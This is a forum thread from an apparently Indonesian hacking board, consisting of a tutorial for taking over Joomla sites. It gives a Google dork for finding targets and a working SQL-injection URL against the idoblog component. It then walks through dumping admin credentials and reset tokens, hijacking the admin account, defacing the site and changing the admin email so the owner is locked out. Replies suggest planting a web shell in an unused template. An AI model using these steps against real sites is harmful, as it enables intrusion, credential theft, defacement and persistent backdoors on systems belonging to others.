Devilzc0de Forum
›
Information Technology
›
Hacking
›
Web Hacking 
Hacking Administrator Joomla – Get Full Access!
Hacking Administrator Joomla – Get Full Access!
Home General Computer Multimedia Business Lounge
|
Hacking Administrator Joomla – Get Full Access!
|
|
05-23-2012, 08:43 PM
(This post was last modified: 05-23-2012 08:48 PM by Mr.Sign.)
 Post: #1 |
|||
|
|||
|
Hacking Administrator Joomla – Get Full Access!
Tools required:
SQL-i Knowledge reiluke SQLiHelper 2.7 Joomla! Query Knowledge Finding Exploit And Target Those two steps could go in different order, depend what you find first target or exploit… Google dork: inurl:”option=com_idoblog” Comes up with results for about 140,000 pages ![[Image: 001cv.png]](http://img838.imageshack.us/img838/300/001cv.png) At inj3ct0r.com search for: com_idoblog Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln ![[Image: 002rg.png]](http://img836.imageshack.us/img836/1907/002rg.png) == Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln == index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+from+jos_users– Exploit can be separated in two parts: Part I index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62 This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed) Part II +union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users– This part looking for username and password from jos_users table Testing Vulnerability Disable images for faster page loading: [Firefox] Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’ Go to: Code: http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22Go to: Code: http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62Go to: Code: http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--Inject Target Open reiluke SQLiHelper 2.7 In Target copy Code: http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62Follow standard steps until you find Column Name, as a result we have ![[Image: 003bd.png]](http://img834.imageshack.us/img834/7643/003bd.png) Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see our target use jos153_users table for storing data Let Dump username, email, password from Column Name jos153_users. Click on Dump Now ![[Image: 004k.png]](http://img217.imageshack.us/img217/3421/004k.png) username: admin email: info@site.com password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a 32 character salt that is appended to the end of the password string. The password is stored as {TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time… The easiest way to hack is to reset Admin password! Admin Password Reset Go to: Code: http://www.site.com/index.php?option=com_user&view=reset![[Image: 005hy.png]](http://img29.imageshack.us/img29/7562/005hy.png) Forgot your Password? page will load. In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit. If you find right admin email, Confirm your account. page will load, asking for Token Finding Token To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users ![[Image: 006fj.png]](http://img691.imageshack.us/img691/1796/006fj.png) username: admin activation: 5482dd177624761a290224270fa55f1d 5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit. ![[Image: 007pa.png]](http://img576.imageshack.us/img576/1710/007pa.png) If you done everything ok, Rest your Password page will load. Enter your new password… After that go to: Code: http://www.site.com/administrator/Enter username admin and your password, click on Login Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!! ![[Image: 008bo.png]](http://img291.imageshack.us/img291/8648/008bo.png) To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail ![[Image: 009kw.png]](http://img707.imageshack.us/img707/8946/009kw.png) Credit: MindFreak [HckGuide] |
|||
|
|||
 Reputed by : adoet_t(+1) , ubuntux(+1) , nggodress(+1) , whiteshen(+1) |
|
05-23-2012, 09:09 PM
Post: #2 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
Nice article, but i hate the defacing part :S any chance to shell it ?
|
|||
|
|
05-23-2012, 09:13 PM
Post: #3 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
nice.. cendol send...
|
|||
|
|
|
05-23-2012, 09:28 PM
Post: #4 |
|||
|
|||
| RE: Hacking Administrator Joomla – Get Full Access! | |||
|
|
|
05-23-2012, 09:31 PM
Post: #5 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
thanks for your artikel and this POC
|
|||
|
|
|
05-23-2012, 09:31 PM
Post: #6 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
Taruh shell aja pas edit themenya
 (pake theme yang gak di jadikan default biar gak langsung ngefek ke indexnya)alamat shellnya di domain.com/templates/nama_template/index.php CMIIW |
|||
|
|
|
05-23-2012, 09:36 PM
Post: #7 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
what do you do if you find token with salt?
|
|||
|
|
|
05-23-2012, 09:59 PM
Post: #8 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
0mz..... ane izin  dulu ya... 
|
|||
|
|
|
05-24-2012, 12:22 PM
(This post was last modified: 05-24-2012 01:15 PM by ohara_inamiji.)
Post: #9 |
|||
|
|||
RE: Hacking Administrator Joomla – Get Full Access!
(05-23-2012 09:31 PM)keyB0T Wrote: Taruh shell aja pas edit themenya itupun kalo bisa di edit shell nya bisa di pasang kalo template nya writable... btw thx om ts buat poc nya bagi teman-teman yang pengen hindarin serangan sqli bisa make htaccess ... cara nya ada di thread ini http://devilzc0de.org/forum/thread-13119.html |
|||
|
|
|
05-24-2012, 05:07 PM
Post: #10 |
|||
|
|||
|
RE: Hacking Administrator Joomla – Get Full Access!
om ijin praktek |
|||
|
|
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
       |
| Possibly Related Threads... | |||||
| Thread: | Author | Replies: | Views: | Last Post | |
| [Tutor] Tutorial Web Hacking dari Nol | denykurniw | 47 | 1,564 |
06-16-2013 01:01 PM Last Post: zhangxiao3 |
|
| Hacking Anatomy (Plus Real Hacking Example) | DnA19 | 45 | 2,155 |
06-11-2013 10:32 AM Last Post: barrabravaz |
|
 |
[Tutor] Hacking Admin Forum | FiIGates | 15 | 425 |
05-23-2013 10:19 PM Last Post: FiIGates |
 |
[Tutor] Live [SQLi] + Reset Password Joomla | momodrock | 24 | 597 |
03-25-2013 09:51 AM Last Post: lanionk |
| [Tutor] 4 trik Cara Upload Shell di Joomla | ./E1nzte1N | 21 | 501 |
02-23-2013 07:42 PM Last Post: Rifaldi238 |
|
| [Tutor] Joomla Remote Shell Upload Vulnerability | panjidani | 3 | 272 |
02-18-2013 03:01 PM Last Post: eidelweiss |
|
| backdooring Joomla 2.5.** | sohai | 7 | 237 |
02-01-2013 08:41 AM Last Post: Nanda |
|
| [Solved] mau belajar web hacking | filmar | 12 | 546 |
12-08-2012 02:47 PM Last Post: ScouT11 |
|
| MS Access Sqli tutz | Net_Spy | 2 | 94 |
11-25-2012 10:36 AM Last Post: skyb0t |
|
| Ya/Tidak Web Hacking | qpdll | 8 | 205 |
10-30-2012 02:31 PM Last Post: hitheir |
|
| Users Browsing |
| 1 Guest(s) |